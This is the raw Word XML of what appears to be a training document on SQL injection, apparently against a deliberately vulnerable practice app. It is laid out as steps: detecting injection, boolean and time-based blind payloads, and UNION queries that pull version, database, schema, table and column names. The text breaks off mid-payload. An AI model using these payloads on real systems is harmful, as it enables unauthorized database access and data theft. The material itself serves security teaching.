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6C4" w:rsidRDefault="003876C4" w:rsidP="003876C4">
      <w:pPr>
        <w:spacing w:before="105" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003876C4" w:rsidRDefault="003876C4" w:rsidP="003876C4">
      <w:pPr>
        <w:spacing w:before="105" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="003876C4" w:rsidRDefault="003876C4" w:rsidP="003876C4">
      <w:pPr>
        <w:spacing w:before="105" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003876C4" w:rsidRPr="003876C4" w:rsidRDefault="003876C4" w:rsidP="003876C4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>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Determine if SQL injection exists</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003876C4" w:rsidRPr="003876C4" w:rsidRDefault="003876C4" w:rsidP="003876C4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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Try injecting characters reserved in databases to produce error messages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single-quote</w:t>
      </w:r>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="770000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t>back-slash</w:t>
      </w:r>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="770000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t>double-hyphen</w:t>
      </w:r>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="770000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t>forward-slash</w:t>
      </w:r>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="770000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t>period</w:t>
      </w:r>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003876C4" w:rsidRPr="003876C4" w:rsidRDefault="003876C4" w:rsidP="003876C4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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If error message is produces, examine message for helpful errors, queries, database brand, columns, tables or other information.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003876C4" w:rsidRPr="003876C4" w:rsidRDefault="003876C4" w:rsidP="003876C4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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If no error message present, send valid data, "true" injections ("or 1=1") and "false" injections ("and 1=0"). Look for difference in the three responses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Blind SQL Injection - True and False Values</w:t>
      </w:r>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True Value (Using Proxy): ' or 1=1 --</w:t>
      </w:r>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="770000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t>False Value (Using Proxy): ' and 1=0 --</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003876C4" w:rsidRPr="003876C4" w:rsidRDefault="003876C4" w:rsidP="003876C4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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If no errors nor differences are produced, try timing attacks ("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> sleep(), </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> server </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>waitfor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>(), oracle sleep()")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 union Select null, null, null, sleep(5) -- </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003876C4" w:rsidRPr="003876C4" w:rsidRDefault="003876C4" w:rsidP="003876C4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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Determine injection types that work</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003876C4" w:rsidRPr="003876C4" w:rsidRDefault="003876C4" w:rsidP="003876C4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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UNION statements</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003876C4" w:rsidRPr="003876C4" w:rsidRDefault="003876C4" w:rsidP="003876C4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>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Determine number of columns in application query. Inject NULL columns until injected query works.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003876C4" w:rsidRPr="003876C4" w:rsidRDefault="003876C4" w:rsidP="003876C4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>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 xml:space="preserve">Determine position of a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>varchar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> or equivalent column</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003876C4" w:rsidRPr="003876C4" w:rsidRDefault="003876C4" w:rsidP="003876C4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>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Use position of found column(s) to place injected columns. Use NULL for rest</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003876C4" w:rsidRPr="003876C4" w:rsidRDefault="003876C4" w:rsidP="003876C4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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lastRenderedPageBreak/>
        <w:t>Inline injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003876C4" w:rsidRPr="003876C4" w:rsidRDefault="003876C4" w:rsidP="003876C4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>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Usually happens when ORDER BY or HAVING clause present in application query</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003876C4" w:rsidRPr="003876C4" w:rsidRDefault="003876C4" w:rsidP="003876C4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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Timing injection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Blind SQL Injection - Timing</w:t>
      </w:r>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="770000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Page: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="770000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>login.php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Value (Using Proxy): ' union Select null, case SUBSTRING(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="770000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>current_user</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="770000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>(),1,1) when 'r' THEN sleep(5) ELSE sleep(0) END, null, null --</w:t>
      </w:r>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="770000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t>Value (Using Direct Request): username=%27%20union%20Select%20null%2C%20case%20SUBSTRING%28current_user%28%29%2C1%2C1%29%20when%20%27r%27%20THEN%20sleep%285%29%20ELSE%20sleep%280%29%20END%2C%20null%2C%20null%20--%20&amp;password=&amp;login-php-submit-button=1 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003876C4" w:rsidRPr="003876C4" w:rsidRDefault="003876C4" w:rsidP="003876C4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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determine database server brand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Direct Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="770000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t>Page: user-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="770000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>info.php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 xml:space="preserve">Value (Using Proxy): ' union select </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="770000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>null,VERSION</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="770000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">() AS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="770000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>username,null,null</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="770000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> -- </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003876C4" w:rsidRPr="003876C4" w:rsidRDefault="003876C4" w:rsidP="003876C4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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Formulate and test query</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003876C4" w:rsidRPr="003876C4" w:rsidRDefault="003876C4" w:rsidP="003876C4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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determine database name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Direct Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="770000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t>Page: user-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="770000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>info.php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 xml:space="preserve">Value (Using Proxy): ' union select </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="770000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>null,DATABASE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="770000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">() AS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="770000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>username,null,null</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="770000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> -- </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003876C4" w:rsidRPr="003876C4" w:rsidRDefault="003876C4" w:rsidP="003876C4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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determine schema name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Direct Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="770000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t>Page: user-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="770000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>info.php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 xml:space="preserve">Value (Using Proxy): ' union select </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="770000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>null,table_schema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="770000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="770000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">AS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="770000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>username,null,null</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="770000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> from INFORMATION_SCHEMA.TABLES-- </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003876C4" w:rsidRPr="003876C4" w:rsidRDefault="003876C4" w:rsidP="003876C4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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determine table(s) names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Direct Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="770000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t>Page: user-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="770000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>info.php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 xml:space="preserve">Value (Using Proxy): ' union select </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="770000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>null,table_schema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="770000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> AS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="770000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>username,table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="770000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> AS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="770000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>password,null</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="770000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> from INFORMATION_SCHEMA.TABLES-- </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003876C4" w:rsidRPr="003876C4" w:rsidRDefault="003876C4" w:rsidP="003876C4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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determine column(s) names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Direct Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="770000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t>Recon: Extract table columns from database using a single field</w:t>
      </w:r>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="770000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t>Page: user-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="770000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>info.php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 xml:space="preserve">Value: ' union select </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="770000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>null,concat_ws</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="770000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">('.', </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="770000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>table_schema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="770000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="770000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="770000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="770000"/>
          <w:sz w:val="27"/>
